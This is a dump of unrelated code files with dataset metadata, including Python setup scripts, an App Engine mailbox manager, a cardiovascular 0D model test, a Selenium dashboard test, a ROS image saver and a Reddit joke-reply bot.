name=PACKAGE_NAME,\n version=_get_version(),\n url=URL,\n description=PACKAGE_DESCRIPTION,\n long_description=open(os.path.join(\n os.path.dirname(__file__), 'README.md')).read(),\n author=AUTHOR_NAME,\n maintainer=AUTHOR_NAME,\n maintainer_email=AUTHOR_EMAIL,\n packages=find_packages(exclude=('tests', 'tests.*')),\n include_package_data=True,\n zip_safe=False,\n classifiers=CLASSIFIERS,\n install_requires=REQUIREMENTS_EXTERNAL,\n dependency_links=DEPENDENCY_LINKS_EXTERNAL,\n scripts=SCRIPTS,\n)\n", "sub_path": "python-toolbox/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 3259, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 74, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 107, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "576786641", "text": "from setuptools import setup\n\n__VERSION__ = \"0.3.1\"\n\n\nsetup(\n name=\"joseph_hello_world\",\n description=\"A hello world plugin for Joseph. 
Writes a hello world message to the logs.\",\n author=\"Niek Keijzer\",\n author_email=\"info@niekkeijzer.com\",\n url=\"https://github.com/NiekKeijzer/HelloWorld\",\n download_url=\"https://github.com/NiekKeijzer/HelloWorld/archive/{}.tar.gz\".format(__VERSION__),\n keywords=[\n \"hello world\",\n \"joseph\"\n ],\n packages=[\n \"hello_world\"\n ],\n version=__VERSION__,\n entry_points={\n 'joseph.actions': [\n 'say_hello = hello_world.hello:say_hello'\n ]\n }\n)", "sub_path": "pypi_install_script/joseph_hello_world-0.3.1.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "setuptools.setup", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "585961978", "text": "\n# -*- coding: utf-8 -*-\n\nfrom base.mailbox import MailboxManager\nfrom models.sender_account import SenderAccountDao\n\n\nclass SenderAccountManager(MailboxManager):\n\n \"\"\"\n Business logic for the SenderAccountDao entity.\n \"\"\"\n\n def __init__(self, user=None, sender_account_id=None):\n\n \"\"\"\n Class constructor.\n :param user: Current user.\n :param sender_account_id: Sender mailbox identifier.\n \"\"\"\n\n super(SenderAccountManager, self).__init__(user)\n if sender_account_id:\n self._sender_account_id = int(sender_account_id)\n\n def create(self, sender_account):\n\n \"\"\"\n Creates a sender mailbox.\n :param sender_account: Dictionary representing a sender mailbox.\n :return: The created sender mailbox.\n \"\"\"\n\n from oauth2client.contrib.appengine import CredentialsModel\n\n # Check that the required fields are included.\n if \"email\" not in sender_account or not sender_account[\"email\"]:\n raise Exception(\"The account must have an email.\")\n\n # Copy the contents of sender_account and set the creating user.\n entity = SenderAccountDao(**sender_account)\n entity.created_by = self._user\n entity.updated_by = self._user\n # Check whether the mailbox has already authorized access for the application.\n # If so, mark it as authorized.\n entity.is_authorized = CredentialsModel.get_by_key_name(entity.email) is not None\n entity.put()\n return entity\n\n def get(self):\n\n \"\"\"\n Gets a sender mailbox.\n :return: The retrieved sender mailbox.\n \"\"\"\n\n from google.appengine.ext.ndb import Key\n\n entity = Key(SenderAccountDao, self._sender_account_id).get()\n # Check whether the mailbox exists.\n if entity is None:\n raise Exception(\"The given entity does not exist.\")\n return entity\n\n @classmethod\n def list(cls):\n\n \"\"\"\n Gets the collection of sender mailboxes.\n :return: The retrieved collection of mailboxes.\n \"\"\"\n\n from google.appengine.api import memcache\n\n memcache_key = SenderAccountDao.COLLECTION_MEMCACHE_KEY\n entities = memcache.get(memcache_key)\n\n if entities is None:\n entities = [k.to_dict() for k in SenderAccountDao.query().iter()]\n memcache.add(memcache_key, entities, 0)\n return entities\n\n def update(self, sender_account):\n\n \"\"\"\n Updates the given sender mailbox.\n :param sender_account: Dictionary representing the sender mailbox.\n :return: The updated sender mailbox.\n \"\"\"\n\n entity = self.get()\n # Check which fields need to be updated.\n if \"email\" in sender_account and sender_account[\"email\"]:\n entity.email = sender_account[\"email\"]\n if \"group\" in sender_account and sender_account[\"group\"]:\n entity.group = 
sender_account[\"group\"]\n if \"is_active\" in sender_account and isinstance(sender_account[\"is_active\"], bool):\n entity.is_active = sender_account[\"is_active\"]\n entity.updated_by = self._user\n entity.put()\n return entity\n\n def add_group(self, group_id):\n\n \"\"\"\n Adds the sender mailbox to a new group.\n :param group_id: Group identifier.\n :return: The updated account.\n \"\"\"\n\n from models.master import MasterDao\n from managers.group import GroupManager\n\n entity = self.get()\n group_id = int(group_id)\n # Check that the sender mailbox does not currently belong to the given group.\n if filter(lambda x: x.id == group_id, entity.groups):\n raise Exception(\"This account is already in this group.\")\n # Otherwise, update it.\n group_entity = GroupManager(group_id=group_id).get()\n master = MasterDao()\n master.id = group_entity.key.id()\n master.name = group_entity.name\n entity.groups.append(master)\n entity.updated_by = self._user\n entity.put()\n return entity\n\n def delete(self):\n\n \"\"\"\n Deletes the given sender mailbox.\n \"\"\"\n\n from google.appengine.ext.ndb import Key\n\n Key(SenderAccountDao, self._sender_account_id).delete()\n\n def delete_group(self, group_id):\n\n \"\"\"\n Removes a group from the sender mailbox's group list.\n :param group_id: Group identifier.\n :return: The updated account.\n \"\"\"\n\n entity = self.get()\n found = False\n group_id = int(group_id)\n for i in range(len(entity.groups)):\n if entity.groups[i].id == group_id:\n entity.groups.pop(i)\n found = True\n break\n # Check that the sender mailbox belongs to the given group.\n if not found:\n raise Exception(\"This account is not in this group.\")\n entity.put()\n return entity\n\n def available_groups(self):\n\n \"\"\"\n Gets the collection of groups the sender mailbox does not belong to yet.\n :return: The retrieved collection.\n \"\"\"\n\n from managers.group import GroupManager\n\n entity = self.get()\n taken_groups = set([k.id for k in entity.groups])\n entity_groups = GroupManager().list()\n all_groups = set([k[\"id\"] for k in entity_groups])\n # [k for k in entity_groups if k[\"id\"] in list(all_groups.difference(taken_groups))]\n return filter(lambda x: x[\"id\"] in list(all_groups.difference(taken_groups)), entity_groups)\n\n @staticmethod\n def get_by_email(email):\n\n \"\"\"\n Gets a sender mailbox by its email.\n :return: The retrieved sender mailbox.\n \"\"\"\n\n entity = SenderAccountDao.query(SenderAccountDao.email == email).get()\n # Check that the mailbox currently exists.\n if entity is None:\n raise Exception(\"The given entity does not exist.\")\n return entity\n\n def authorize(self, email):\n\n \"\"\"\n Marks the given sender mailbox as authorized and creates the DUPLICADO,\n GESTIONADO, PDTE REINTENTAR and ERROR labels in the given mailbox.\n :param email: Mailbox identifier.\n :return: The authorized mailbox.\n \"\"\"\n\n from pending_authorization import PendingAuthorizationManager\n from core.logger import Logger\n\n try:\n entity = self.get_by_email(email)\n if entity is not None:\n # Mark the mailbox as authorized.\n entity.is_authorized = True\n # Add the tracking information.\n entity.updated_by = self._user\n entity.put()\n # Get the dictionary representing the updated mailbox.\n entity = entity.to_dict()\n # Remove the pending authorization.\n PendingAuthorizationManager.delete(entity[\"user_id\"])\n except Exception as e:\n Logger.error(e)\n raise e\n return entity\n", "sub_path": "managers/sender_account.py", 
"file_name": "sender_account.py", "file_ext": "py", "file_size_in_byte": 7174, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.mailbox.MailboxManager", "line_number": 8, "usage_type": "name"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 41, "usage_type": "call"}, {"api_name": "oauth2client.contrib.appengine.CredentialsModel.get_by_key_name", "line_number": 46, "usage_type": "call"}, {"api_name": "oauth2client.contrib.appengine.CredentialsModel", "line_number": 46, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 59, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 59, "usage_type": "argument"}, {"api_name": "models.sender_account.SenderAccountDao.COLLECTION_MEMCACHE_KEY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 75, "usage_type": "name"}, {"api_name": "google.appengine.api.memcache.get", "line_number": 76, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 76, "usage_type": "name"}, {"api_name": "models.sender_account.SenderAccountDao.query", "line_number": 79, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 79, "usage_type": "name"}, {"api_name": "google.appengine.api.memcache.add", "line_number": 80, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 80, "usage_type": "name"}, {"api_name": "managers.group.GroupManager", "line_number": 120, "usage_type": "call"}, {"api_name": "models.master.MasterDao", "line_number": 121, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 137, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 137, "usage_type": "argument"}, {"api_name": "managers.group.GroupManager", "line_number": 172, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao.query", "line_number": 185, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 185, "usage_type": "name"}, {"api_name": "models.sender_account.SenderAccountDao.email", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pending_authorization.PendingAuthorizationManager.delete", "line_number": 214, "usage_type": "call"}, {"api_name": "pending_authorization.PendingAuthorizationManager", "line_number": 214, "usage_type": "name"}, {"api_name": "core.logger.Logger.error", "line_number": 216, "usage_type": "call"}, {"api_name": "core.logger.Logger", "line_number": 216, "usage_type": "name"}]} +{"seq_id": "617345222", "text": "#!/usr/bin/env python3\n\nimport ambit\n\nimport sys, traceback\nimport numpy as np\nfrom pathlib import Path\n\nimport results_check\n\n\ndef main():\n\n basepath = str(Path(__file__).parent.absolute())\n\n IO_PARAMS = {'problem_type' : 'flow0d', # solid, fluid, flow0d, solid_flow0d, fluid_flow0d\n 'write_results_every' : -999,\n 'output_path' : ''+basepath+'/tmp',\n 'simname' : 'test'}\n\n SOLVER_PARAMS = {'tol_res' : 1.0e-8,\n 'tol_inc' : 1.0e-8}\n\n TIME_PARAMS = {'maxtime' : 10*1.0,\n 'numstep' : 10*100,\n 'timint' : 'ost', # ost\n 'theta_ost' : 0.5,\n 'initial_conditions' : init(),\n 'eps_periodic' : 0.03,\n 'periodic_checktype' : 'pQvar'}\n \n MODEL_PARAMS = {'modeltype' : 'syspul',\n 'parameters' : param(),\n 'chamber_models' : {'lv' : {'type' : '0D_elast', 'activation_curve' : 2}, 
'rv' : {'type' : '0D_elast', 'activation_curve' : 2}, 'la' : {'type' : '0D_elast', 'activation_curve' : 1}, 'ra' : {'type' : '0D_elast', 'activation_curve' : 1}}}\n \n\n # define your time curves here (syntax: tcX refers to curve X)\n class time_curves():\n \n def tc1(self, t): # atrial activation\n \n act_dur = 2.*param()['t_ed']\n t0 = 0.\n \n if t >= t0 and t <= t0 + act_dur:\n return 0.5*(1.-np.cos(2.*np.pi*(t-t0)/act_dur))\n else:\n return 0.0\n\n def tc2(self, t): # ventricular activation\n \n act_dur = 1.8*(param()['t_es'] - param()['t_ed'])\n t0 = param()['t_ed']\n \n if t >= t0 and t <= t0 + act_dur:\n return 0.5*(1.-np.cos(2.*np.pi*(t-t0)/act_dur))\n else:\n return 0.0\n\n\n # problem setup\n problem = ambit.Ambit(IO_PARAMS, TIME_PARAMS, SOLVER_PARAMS, constitutive_params=MODEL_PARAMS, time_curves=time_curves())\n \n # solve time-dependent problem\n problem.solve_problem()\n\n\n # --- results check\n tol = 1.0e-6\n\n s_corr = np.zeros(problem.mp.cardvasc0D.numdof)\n\n # correct results\n s_corr[0] = 2.7156831671111686E+04\n s_corr[1] = 6.5014832315152615E-01\n s_corr[2] = 2.3863884814303105E-01\n s_corr[3] = 6.2299149148041377E-01\n s_corr[4] = 7.3204325568836603E+00\n s_corr[5] = 4.4855244723865435E+04\n s_corr[6] = 1.9666233818994407E+00\n s_corr[7] = -2.3737219188883661E+04\n s_corr[8] = 3.2279121521802968E+04\n s_corr[9] = 4.9648390872022957E-01\n s_corr[10] = 1.6997499381247427E-01\n s_corr[11] = 4.6420478719842723E-01\n s_corr[12] = 1.8990559860434069E+00\n s_corr[13] = -8.1705347914691476E+04\n s_corr[14] = 1.4965782216339247E+00\n s_corr[15] = -1.0232540549572852E+04\n \n check1 = results_check.results_check_vec(problem.mp.s, s_corr, problem.mp.comm, tol=tol)\n success = results_check.success_check([check1], problem.mp.comm)\n \n return success\n\n\ndef init():\n \n return {'q_vin_l_0' : 0.0,\n 'p_at_l_0' : 0.599950804034,\n 'q_vout_l_0' : 0.0,\n 'p_v_l_0' : 0.599950804034,\n 'p_ar_sys_0' : 9.68378038166,\n 'q_ar_sys_0' : 0.0,\n 'p_ven_sys_0' : 2.13315841434,\n 'q_ven_sys_0' : 0.0,\n 'q_vin_r_0' : 0.0,\n 'p_at_r_0' : 0.0933256806275,\n 'q_vout_r_0' : 0.0,\n 'p_v_r_0' : 0.0933256806275,\n 'p_ar_pul_0' : 3.22792679389,\n 'q_ar_pul_0' : 0.0,\n 'p_ven_pul_0' : 1.59986881076,\n 'q_ven_pul_0' : 0.0}\n\n\ndef param():\n \n # parameters in kg-mm-s unit system\n \n R_ar_sys = 120.0e-6\n tau_ar_sys = 1.0311433159\n tau_ar_pul = 0.3\n \n # Diss Hirschvogel tab. 
2.7\n C_ar_sys = tau_ar_sys/R_ar_sys\n Z_ar_sys = R_ar_sys/20.\n R_ven_sys = R_ar_sys/5.\n C_ven_sys = 30.*C_ar_sys\n R_ar_pul = R_ar_sys/8.\n C_ar_pul = tau_ar_pul/R_ar_pul\n Z_ar_pul = 0.\n R_ven_pul = R_ar_pul\n C_ven_pul = 2.5*C_ar_pul\n \n L_ar_sys = 0.667e-6\n L_ven_sys = 0.\n L_ar_pul = 0.\n L_ven_pul = 0.\n \n # timings\n t_ed = 0.2\n t_es = 0.53\n T_cycl = 1.0\n \n # atrial elastances\n E_at_max_l = 2.9e-5\n E_at_min_l = 9.0e-6\n E_at_max_r = 1.8e-5\n E_at_min_r = 8.0e-6\n # ventricular elastances\n E_v_max_l = 30.0e-5\n E_v_min_l = 12.0e-6\n E_v_max_r = 20.0e-5\n E_v_min_r = 10.0e-6\n \n \n return {'R_ar_sys' : R_ar_sys,\n 'C_ar_sys' : C_ar_sys,\n 'L_ar_sys' : L_ar_sys,\n 'Z_ar_sys' : Z_ar_sys,\n 'R_ar_pul' : R_ar_pul,\n 'C_ar_pul' : C_ar_pul,\n 'L_ar_pul' : L_ar_pul,\n 'Z_ar_pul' : Z_ar_pul,\n 'R_ven_sys' : R_ven_sys,\n 'C_ven_sys' : C_ven_sys,\n 'L_ven_sys' : L_ven_sys,\n 'R_ven_pul' : R_ven_pul,\n 'C_ven_pul' : C_ven_pul,\n 'L_ven_pul' : L_ven_pul,\n # atrial elastances\n 'E_at_max_l' : E_at_max_l,\n 'E_at_min_l' : E_at_min_l,\n 'E_at_max_r' : E_at_max_r,\n 'E_at_min_r' : E_at_min_r,\n # ventricular elastances\n 'E_v_max_l' : E_v_max_l,\n 'E_v_min_l' : E_v_min_l,\n 'E_v_max_r' : E_v_max_r,\n 'E_v_min_r' : E_v_min_r,\n # valve resistances\n 'R_vin_l_min' : 1.0e-6,\n 'R_vin_l_max' : 1.0e1,\n 'R_vout_l_min' : 1.0e-6,\n 'R_vout_l_max' : 1.0e1,\n 'R_vin_r_min' : 1.0e-6,\n 'R_vin_r_max' : 1.0e1,\n 'R_vout_r_min' : 1.0e-6,\n 'R_vout_r_max' : 1.0e1,\n # timings\n 't_ed' : t_ed,\n 't_es' : t_es,\n 'T_cycl' : T_cycl,\n # unstressed compartment volumes (for post-processing)\n 'V_at_l_u' : 0.0,\n 'V_at_r_u' : 0.0,\n 'V_v_l_u' : 0.0,\n 'V_v_r_u' : 0.0,\n 'V_ar_sys_u' : 0.0,\n 'V_ar_pul_u' : 0.0,\n 'V_ven_sys_u' : 0.0,\n 'V_ven_pul_u' : 0.0}\n\n\n\n\nif __name__ == \"__main__\":\n \n success = False\n \n try:\n success = main()\n except:\n print(traceback.format_exc())\n \n if success:\n sys.exit(0)\n else:\n sys.exit(1)\n", "sub_path": "testing/flow0d_0Dheart_syspul.py", "file_name": "flow0d_0Dheart_syspul.py", "file_ext": "py", "file_size_in_byte": 6590, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 56, "usage_type": "attribute"}, {"api_name": "ambit.Ambit", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "results_check.results_check_vec", "line_number": 91, "usage_type": "call"}, {"api_name": "results_check.success_check", "line_number": 92, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 218, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 220, "usage_type": "call"}]} +{"seq_id": "221986894", "text": "# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport copy\nimport pandas as pd\nfrom pandas import DataFrame as df\nimport time\nimport os\nimport sys\nsys.path.append('..')\nimport config as conf\n\nfrom selenium import webdriver # import webdriver from the selenium library\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import Select\n\nfrom 
selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\n\n\nclass Federatorai_Selenium():\n\n def __init__(self, browser):\n self.wait = WebDriverWait(browser, 60, 0.5)\n self.browser = browser\n pass\n\n def login(self, ip, account, password):\n self.browser.get(\"https://federatorai-dashboard-frontend-federatorai.apps.%s.nip.io\" %ip)\n\n self.browser.find_element_by_xpath(\"//input[@tabindex='1']\").send_keys(account) # enter account\n time.sleep(2)\n\n self.browser.find_element_by_xpath(\"//input[@tabindex='2']\").send_keys(password) # enter password\n time.sleep(2)\n\n self.browser.find_element_by_xpath(\"//button[@class='el-button el-button--primary el-button--medium']\").click() # login\n time.sleep(5)\n\n def cost_multicloud_cost_analysis(self):\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]\").click() # Cost\n time.sleep(1)\n\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]/li[1]/ul[1]/div[1]\").click() # Multicloud Cost Analysis\n time.sleep(2)\n\n # region check\n self.browser.find_element_by_xpath(\"//form[@class='el-form el-form--label-left el-form--inline']/div[2]/div[1]\").click()\n time.sleep(2)\n self.wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='el-select-dropdown el-popper select-popper']/div[1]/div[1]/ul[1]/li[1]\")))\n time.sleep(5)\n\n # ----success to get region----\n # ----use mouse to click----\n for i in range(3, 30): # fail to get 0:All 1:Australia(These two items will jump to other page)\n try:\n element = self.browser.find_element_by_xpath(\"//div[@class='el-select-dropdown el-popper select-popper']/div[1]/div[1]/ul[1]/li[%s]\" % i)\n ActionChains(self.browser).move_to_element(element).perform()\n ActionChains(self.browser).click(element).perform()\n print(element.text)\n self.browser.find_element_by_xpath(\"//form[@class='el-form el-form--label-left el-form--inline']/div[2]/div[1]\").click()\n time.sleep(2)\n except:\n pass\n\n # ----fail to get region----\n #all_region = browser.find_element_by_xpath(\"//div[@class='el-select-dropdown el-popper select-popper']/div[1]/div[1]/ul[1]\")\n #print(all_region.text)\n\n\n # check current price and region\n current_info = self.browser.find_element_by_xpath(\"//div[@class='el-row']/section[1]/main[1]/div[1]/div[1]\")\n # print(current_info.text)\n current_info_list = str(current_info.text).splitlines()\n print(current_info_list)\n price = current_info_list[-4]\n region = current_info_list[-1]\n print(price, region)\n time.sleep(5)\n\n def cost_cost_allocation(self):\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]\").click() # Cost\n time.sleep(1)\n\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]/li[1]/ul[1]/div[2]\").click() # Cost Allocation\n time.sleep(5)\n\n def about(self):\n self.browser.find_element_by_xpath(\"//div[@class='avatar-container right-menu-item hover-effect el-dropdown']\").click() # About\n time.sleep(2)\n\n self.browser.find_element_by_xpath(\"//ul[@class='el-dropdown-menu el-popper el-dropdown-menu--medium']/li[2]\").click()\n time.sleep(2)\n\n about_info = self.browser.find_element_by_xpath(\"//div[@class='el-dialog__body']\")\n print(about_info.text)\n\n def dashbard(self):\n\n node_number = 
self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[1]/div[1]/div[1]/p[1]\")\n print(node_number.text)\n\n node_info = self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[2]/div[1]/div[2]/div[3]\")\n #print(node_info.text)\n node_info_list = str(node_info.text).splitlines()\n #print(node_info_list)\n\n application_info = self.browser.find_element_by_xpath(\"//div[@class='container']/div[2]/div[2]/section[1]/main[1]/div[1]/div[1]/div[2]/div[3]\")\n #print(application_info.text)\n application_info_list = str(application_info.text).splitlines()\n print(application_info_list)\n\n # test search function\n search_string = input(\"search string:\")\n self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[2]/div[1]/div[1]/div[1]/input[1]\").send_keys(search_string)\n node_info = self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[2]/div[1]/div[2]/div[3]\")\n print(node_info.text)\n\n time.sleep(5)\n\nif __name__ == '__main__':\n # create browser\n browser = webdriver.Chrome(\"C:\\\\Users\\\\Brian\\\\Desktop\\\\python_crawl\\\\chromedriver.exe\")\n browser.maximize_window()\n \n # test\n federatorai_gui_operation = Federatorai_Selenium(browser)\n federatorai_gui_operation.login(\"172.31.6.110\", \"admin\", \"admin\")\n #federatorai_gui_operation.cost_multicloud_cost_analysis()\n #federatorai_gui_operation.about()\n federatorai_gui_operation.dashbard()\n\n # close browser\n browser.close()\n", "sub_path": "fedemeter_cost_db_prepare/python_crawl/federatorai_gui_test/pototype.py", "file_name": "pototype.py", "file_ext": "py", "file_size_in_byte": 5788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 53, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 61, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 93, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", 
"line_number": 122, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 126, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 126, "usage_type": "name"}]} +{"seq_id": "22074124", "text": "#!/usr/bin/env python3\n\n# Shebang changed from ``python2`` (2022/3/16)\n# Any reason older Python version was used?\n\nimport time\nimport threading\nimport rospy\nimport numpy\nimport os\nimport sys\n\nsys.path.append(\"/home/amigos/ros/src/necst/lib\")\nsys.path.append(\"/opt/ros/kinetic/lib/python2.7/dist-packages\")\nsys.path.append(\"/home/amigos/Pictures/capture\")\nimport cv2\nfrom cv_bridge import CvBridge\nfrom PIL import Image as i\nfrom sensor_msgs.msg import Image as Imagemsg\nfrom necst.msg import oneshot_msg\n\n\nclass Image(object):\n filename = \"\"\n dirname = \"\"\n shot_mode = \"\"\n\n def __init__(self):\n pass\n\n def Image_save(self, req):\n if os.path.exists(self.dirname + self.filename) == True:\n return\n else:\n print(\"subscribe picture\")\n bridge = CvBridge()\n img_data = bridge.imgmsg_to_cv2(req, \"bgr8\")\n if not os.path.exists(self.dirname):\n os.makedirs(self.dirname)\n cv2.imwrite(self.dirname + self.filename, img_data)\n print(self.dirname, self.filename)\n print(\"save picture\")\n if self.shot_mode == \"oneshot\":\n img = i.open(self.dirname + self.filename)\n img.show()\n elif self.shot_mode == \"all_sky\":\n pass\n self.filename = \"\"\n return\n\n def dif_file(self, req):\n self.filename = req.filename + \".jpg\"\n self.dirname = req.dirname\n return\n\n\nif __name__ == \"__main__\":\n image = Image()\n rospy.init_node(\"Image_saver\")\n sub1 = rospy.Subscriber(\"Image\", Imagemsg, image.Image_save)\n sub2 = rospy.Subscriber(\"oneshot\", oneshot_msg, image.dif_file)\n print(\"waiting picture\")\n rospy.spin()\n", "sub_path": "scripts/device/ROS_image.py", "file_name": "ROS_image.py", "file_ext": "py", "file_size_in_byte": 1750, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "cv_bridge.CvBridge", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 40, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "rospy.init_node", "line_number": 59, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 60, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 60, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 61, "usage_type": "call"}, {"api_name": "necst.msg.oneshot_msg", "line_number": 61, "usage_type": "argument"}, {"api_name": "rospy.spin", 
"line_number": 63, "usage_type": "call"}]} +{"seq_id": "54521902", "text": "import praw\nimport time\n\n\"\"\"\nDadBot.py\n\nCreates a dad joke in the subreddit for every comment that contains \"I'm\"\n\"\"\"\n\nreddit = praw.Reddit(user_agent=\"DadBot\") # put a better name here\nreddit.login()\n\nwords_to_match = ['i\\'m'] # list goes here\ncache = [] # holds comments already replied to\n\n\ndef run_bot():\n load_cache()\n subreddit = reddit.get_subreddit(\"asdfmattsubreddittest\")\n comments = subreddit.get_comments()\n\n for comment in comments:\n comment_text = comment.body.lower()\n is_match = any(string in comment_text for string in words_to_match)\n\n if comment.id not in cache and is_match:\n text = comment.body.split(\"I'm \", 1)[1]\n\n # reply var to get our comment id so infinite cycle doesn't occur\n reply = comment.reply(\"Hi %s, I'm Dad!\" % text)\n comment.reply(\"Hi %s, I'm Dad!\" % text)\n\n cache.append(comment.id)\n cache.append(reply.id)\n # END if\n # END for\n# END run_bot()\n\n\ndef load_cache():\n with open(\"dadbot_cache.txt\", \"r\") as ins:\n for line in ins:\n if line not in cache:\n cache.append(line)\n # END for\n # END open\n# END load_cache()\n\n\ndef write_cache():\n cache_file = open(\"dadbot_cache.txt\", \"w\")\n for item in cache[:-1]:\n cache_file.write(\"%s\\n\" % item)\n else:\n cache_file.write(\"%s\" % item)\n # END for\n cache_file.close()\n# END write_cache()\n\n\nwhile True:\n try:\n run_bot()\n # not sure if praw has something built in\n time.sleep(10)\n except KeyboardInterrupt:\n print(\"Ending\")\n write_cache()\n SystemExit(0)\n# END while", "sub_path": "src/DadBot.py", "file_name": "DadBot.py", "file_ext": "py", "file_size_in_byte": 1671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "praw.Reddit", "line_number": 10, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "419457843", "text": "import 